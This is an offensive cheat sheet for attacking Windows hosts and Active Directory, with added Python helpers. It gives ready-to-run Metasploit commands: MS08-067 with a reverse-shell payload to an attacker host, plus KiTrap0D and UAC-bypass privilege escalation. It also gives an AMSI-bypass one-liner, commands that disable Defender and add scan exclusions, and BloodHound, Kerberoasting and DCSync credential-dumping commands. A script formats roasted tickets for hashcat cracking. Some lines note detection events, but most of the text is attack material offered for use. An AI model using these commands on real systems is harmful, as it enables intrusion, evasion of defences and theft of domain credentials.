Windows Version Identification
Version Detection Methods
# Nmap OS detection (TCP/IP stack fingerprint; needs root for raw sockets)
sudo nmap -O target.com
# SMB version detection (OS name and build from the SMB session setup; no credentials needed)
nmap -p 445 --script smb-os-discovery target.com
# RDP version detection (product version and build from the NTLM challenge in the CredSSP/NLA handshake)
nmap -p 3389 --script rdp-ntlm-info target.com
Windows Version Build Numbers
Windows XP
5.1 (Build 2600)
Windows 7
6.1 (Build 7600 RTM, 7601 SP1; Server 2008 R2 uses the same builds)
Windows 10
10.0 (Build 10240 and up; Server 2016/2019/2022 share the 10.0 line)
Windows 11
10.0 (Build 22000 and up; Windows 11 still reports major version 10.0 over every channel, so the build number is the only reliable way to tell it from Windows 10)
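Worked example (added here; not part of the original cheat sheet): a parser for the text output of the smb-os-discovery scan above that pulls the build number out of each host's OS line and classifies it with the build table. The point it demonstrates is that the version in parentheses is the LAN Manager string (6.1, 6.3) and the product name still says "Windows 10" on Windows 11, so only the build is trustworthy. The nmap output embedded in the script is constructed, not a real scan; the build ranges are standard Microsoft build numbering.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Build-number ranges to OS family. Windows 10, Windows 11 and Server 2016-2022 all report
# major.minor 10.0, and SMB's LAN Manager string calls them 6.3, so the build is the only
# reliable discriminator. Everything below 10240 is out of support.
BUILD_FAMILIES = [
    (2600, 2600, "Windows XP"),
    (3790, 3790, "Windows Server 2003"),
    (6000, 6003, "Windows Vista / Server 2008"),
    (7600, 7601, "Windows 7 / Server 2008 R2"),
    (9200, 9200, "Windows 8 / Server 2012"),
    (9600, 9600, "Windows 8.1 / Server 2012 R2"),
    (10240, 21999, "Windows 10 / Server 2016-2022"),
    (22000, 99999, "Windows 11"),
]
FIRST_SUPPORTED_BUILD = 10240

# Constructed sample of `nmap -p 445 --script smb-os-discovery` text output (three hosts).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.5
Host script results:
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|_  System time: 2024-01-01T00:00:00+00:00

Nmap scan report for 10.0.0.7
Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|_  System time: 2024-01-01T00:00:00+00:00

Nmap scan report for 10.0.0.9
Host script results:
| smb-os-discovery:
|   OS: Windows 10 Pro 22631 (Windows 10 Pro 6.3)
|_  System time: 2024-01-01T00:00:00+00:00
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)
OS_RE = re.compile(r"^\|\s+OS:\s+(.+)$", re.M)


@dataclass
class HostOS:
    host: str
    os_line: str
    build: Optional[int]
    family: str
    legacy: bool


def build_from_os_line(os_line: str) -> Optional[int]:
    """Take the last 4-5 digit number before the parenthesised LAN Manager string,
    so marketing years such as 'Server 2008 R2' are not mistaken for the build."""
    head = os_line.split("(")[0]
    numbers = re.findall(r"\b(\d{4,5})\b", head)
    return int(numbers[-1]) if numbers else None


def family_for(os_line: str, build: Optional[int]) -> str:
    if build is not None:
        for low, high, name in BUILD_FAMILIES:
            if low <= build <= high:
                return name
        return "unknown (build %d)" % build
    # SMB1-only stacks (XP, 2000) give no build; fall back on the product name.
    for name in ("Windows XP", "Windows 2000", "Windows Server 2003"):
        if os_line.startswith(name):
            return name
    return "unknown"


def parse_smb_os_discovery(text: str) -> List[HostOS]:
    parts = HOST_RE.split(text)  # ['', host1, body1, host2, body2, ...]
    results = []
    for host, body in zip(parts[1::2], parts[2::2]):
        match = OS_RE.search(body)
        if not match:
            continue  # port closed or the script produced nothing for this host
        os_line = match.group(1).strip()
        build = build_from_os_line(os_line)
        family = family_for(os_line, build)
        legacy = build < FIRST_SUPPORTED_BUILD if build is not None else family != "unknown"
        results.append(HostOS(host, os_line, build, family, legacy))
    return results


if __name__ == "__main__":
    for h in parse_smb_os_discovery(SAMPLE_NMAP_OUTPUT):
        print(f"{h.host:<12} build={h.build} {h.family}{'  [LEGACY]' if h.legacy else ''}")
```

Feed it `nmap -p 445 --script smb-os-discovery -oN scan.txt` output and the legacy flag gives the hosts worth checking against the XP/2003 and Windows 7 sections below.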
Windows XP/Server 2003 (Legacy)
Known Vulnerabilities
Critical Legacy Vulnerabilities (all reachable over the network and give code execution as SYSTEM):
- MS08-067 (Conficker): stack overflow in the Server service's NetAPI32 path canonicalization, reached over SMB/RPC (port 445)
- MS03-026 (Blaster): buffer overflow in the DCOM RPC interface (port 135)
- MS04-011 (Sasser): buffer overflow in LSASS, reached over RPC
- MS05-039 (Zotob): buffer overflow in the Plug and Play service, reached over SMB/RPC
# MS08-067 exploitation (msfconsole). The module fingerprints the target over SMB to pick
# a return address; if auto-detection fails, run 'show targets' and set TARGET by hand.
# It is a stack overflow: a wrong target crashes the Server service instead of returning a shell.
use exploit/windows/smb/ms08_067_netapi
set RHOSTS target.com
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST attacker-ip
exploit
Windows 7/Server 2008
Common Attack Vectors
# MS10-015 (KiTrap0D): local privilege escalation to SYSTEM via the 16-bit NTVDM subsystem.
# Only 32-bit Windows has NTVDM, so this needs an x86 session on an x86 install; it does nothing on x64.
use exploit/windows/local/ms10_015_kitrap0d
set SESSION 1
exploit
# UAC Bypass - bypassuac: only works when the current user is already in the local Administrators
# group (medium-integrity admin token) and UAC is not set to "Always notify"; returns a new
# high-integrity session rather than SYSTEM.
use exploit/windows/local/bypassuac
set SESSION 1
exploit
Windows 10/11/Server 2016+
Modern Security Features
Windows Defender ATP (now Microsoft Defender for Endpoint)
EDR on top of the local antivirus: cloud-connected telemetry, behavioral detection and response
Device Guard (now Windows Defender Application Control, WDAC)
Code-integrity policies that allow only trusted binaries, drivers and scripts to run
Credential Guard
Isolates LSASS secrets (NTLM hashes, Kerberos TGTs) in a VBS-protected process, so dumping lsass.exe yields no domain credentials
Control Flow Guard
Compiler-inserted checks on indirect calls that break ROP/JOP-style hijacking of memory corruption bugs
Bypass Techniques
# AMSI bypass: flips PowerShell's private amsiInitFailed flag so the session skips AMSI scanning.
# Defender signatures this exact string, so in practice it must be obfuscated (string concatenation,
# reflection on the type name) or it is blocked before it runs; it also lands in Script Block Logging (event 4104).
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Windows Defender bypass: both commands need an elevated (admin) shell. On current builds Tamper
# Protection blocks disabling real-time monitoring outright (and, on Defender for Endpoint-managed
# devices, exclusion changes too); check (Get-MpComputerStatus).IsTamperProtected first. Disabling
# real-time protection is logged as event 5001 in the Defender operational log.
powershell "Set-MpPreference -DisableRealtimeMonitoring $true"
powershell "Add-MpPreference -ExclusionPath 'C:\temp'"
Domain Controller Attacks
Active Directory Enumeration
# BloodHound data collection (needs a valid domain account; -ns points DNS at the DC so
# LDAP/SMB names resolve from a non-domain-joined box)
bloodhound-python -u username -p password -ns dc-ip -d domain.com -c all
# Kerberoasting: any domain user can request TGS tickets for accounts with an SPN. The ticket is
# encrypted with the service account's password hash, so it cracks offline. RC4 (etype 23) tickets
# crack with hashcat -m 13100; AES (etype 17/18) tickets need -m 19600/19700 and are far slower.
impacket-GetUserSPNs domain.com/user:password -dc-ip dc-ip -request -outputfile kerberoast.txt
# DCSync attack: asks the DC to replicate password data, which needs the Replicating Directory Changes
# rights (Domain Admins, Enterprise Admins and DC computer accounts by default). It logs as event 4662
# on the DC with the DS-Replication-Get-Changes-All control access right.
impacket-secretsdump domain.com/user:password@dc-ip -just-dc-ntlm
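Worked example (added here; not part of the original cheat sheet or of impacket): what the Kerberoasting step above produces once a ticket is in hand, namely the enc-part of each service ticket rewritten into the `$krb5tgs$` line hashcat and john crack, grouped into one job per hashcat mode. The layout follows the one impacket's GetUserSPNs `-outputfile` writes: RC4 tickets carry the 16-byte checksum first, AES tickets carry a 12-byte checksum at the end, and the SPN's port separator is escaped as `~`. The ticket bytes, account names and realm below are constructed placeholders, not real Kerberos data.

```python
from dataclasses import dataclass
from typing import Dict, Iterable, List

# hashcat mode for each Kerberos encryption type a TGS enc-part can carry
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}


@dataclass
class RoastedTicket:
    etype: int     # enc-part etype: 23 = RC4-HMAC, 17 = AES128, 18 = AES256
    user: str      # sAMAccountName of the service account
    realm: str     # ticket realm, uppercase
    spn: str       # SPN the ticket was requested for
    cipher: bytes  # raw enc-part cipher bytes


def hashcat_mode(etype: int) -> int:
    if etype not in HASHCAT_MODES:
        raise ValueError(f"no hashcat mode for etype {etype}")
    return HASHCAT_MODES[etype]


def krb5tgs_hashcat_line(etype: int, user: str, realm: str, spn: str, cipher: bytes) -> str:
    """Format one ticket's enc-part the way hashcat/john expect it."""
    spn = spn.replace(":", "~")  # impacket escapes the port separator as '~'
    if etype == 23:
        # RC4-HMAC: 16-byte HMAC-MD5 checksum first, encrypted data after it
        if len(cipher) <= 16:
            raise ValueError("RC4 enc-part too short")
        return f"$krb5tgs$23$*{user}${realm}${spn}*${cipher[:16].hex()}${cipher[16:].hex()}"
    if etype in (17, 18):
        # AES-CTS-HMAC-SHA1-96: the 12-byte checksum sits at the END of the ciphertext
        if len(cipher) <= 12:
            raise ValueError("AES enc-part too short")
        return f"$krb5tgs${etype}${user}${realm}$*{spn}*${cipher[-12:].hex()}${cipher[:-12].hex()}"
    raise ValueError(f"unsupported etype {etype}")


def roast(tickets: Iterable[RoastedTicket]) -> Dict[int, List[str]]:
    """Group crackable lines by hashcat mode so each mode runs as one job."""
    jobs: Dict[int, List[str]] = {}
    for t in tickets:
        mode = hashcat_mode(t.etype)
        jobs.setdefault(mode, []).append(
            krb5tgs_hashcat_line(t.etype, t.user, t.realm, t.spn, t.cipher)
        )
    return jobs


# Constructed sample tickets; the cipher bytes are placeholders, not real Kerberos data.
SAMPLE_TICKETS = [
    RoastedTicket(23, "svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", bytes(range(64))),
    RoastedTicket(18, "svc_http", "CORP.LOCAL", "HTTP/web01.corp.local", bytes(range(255, 191, -1))),
]

if __name__ == "__main__":
    for mode, lines in roast(SAMPLE_TICKETS).items():
        print(f"hashcat -m {mode} ({len(lines)} hashes)")
        for line in lines:
            print("  " + line)
```

The etype comes from the ticket, not from the requester: it is the strongest type the service account supports, so an account with only AES set in msDS-SupportedEncryptionTypes will never hand back an RC4 ticket, and the grouping above makes that cost visible before cracking starts.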